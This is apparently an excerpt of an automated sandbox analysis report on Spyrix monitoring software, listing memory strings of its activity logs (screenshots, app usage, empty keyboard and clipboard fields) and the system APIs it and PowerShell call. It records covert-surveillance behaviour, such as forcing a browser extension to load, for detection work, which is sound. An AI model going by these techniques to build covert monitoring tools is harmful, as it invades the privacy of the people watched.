Source: spkl.exe, 00000038.00000002.2746632236.0000000006621000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}t"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000038.00000002.2746632236.00000000065BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: t{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000038.00000002.2746632236.0000000006500000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: i{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":"LOG10ENTRY"}anel
Source: spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CPRG_STAT;45567.0091449884;explorer.exe;Program Manager;[0,0];userP
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:10.12700"
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user"1
Source: spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}"
Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o2024-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"0","sUser":"user","SNode":"PRG_STAT","Reserved1":"0"}
Source: spkl.exe, 00000038.00000002.2753080685.00000000076C4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: yboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":"LOG10ENTRY"}
Source: spkl.exe, 00000038.00000002.2758244726.00000000088C6000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2745442098.0000000004D80000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: {"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":[{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}]}
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}zationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints --start-maximized --load-extension=C:\\Windows\\crx --single-argument https://dashboard.spyrix.com/";ert}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: explorer.exe;Program Manager
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Managert Print to PDF
Source: spkl.exe, 00000038.00000002.2746632236.0000000006621000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: [{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}]
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: V{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager",0s6s
Source: spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"0","sUser":"user","SNode":"PRG_STAT","Reserved1":"0"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661525411.000000000175A000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2742570837.0000000004556000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000003.2661525411.000000000175A000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726418979.000000000175B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}**
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}tionClassName = "Win32_ComputerSystem";
Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2626314828.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +2024-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000003.2626314828.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2726418979.0000000001755000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +2024-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}ubertQ
Source: spkl.exe, 00000038.00000003.2626606901.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: [{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}]U

Contains functionality to query CPU information (cpuid)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_0051EE90 cpuid

71_2_0051EE90

Contains functionality to query locales information (e.g. system language)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	56_2_0040AD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	56_2_0040A298
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	56_2_03374CB8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	56_2_03374D8A
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetLocaleInfoA,	56_2_03379C9C

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
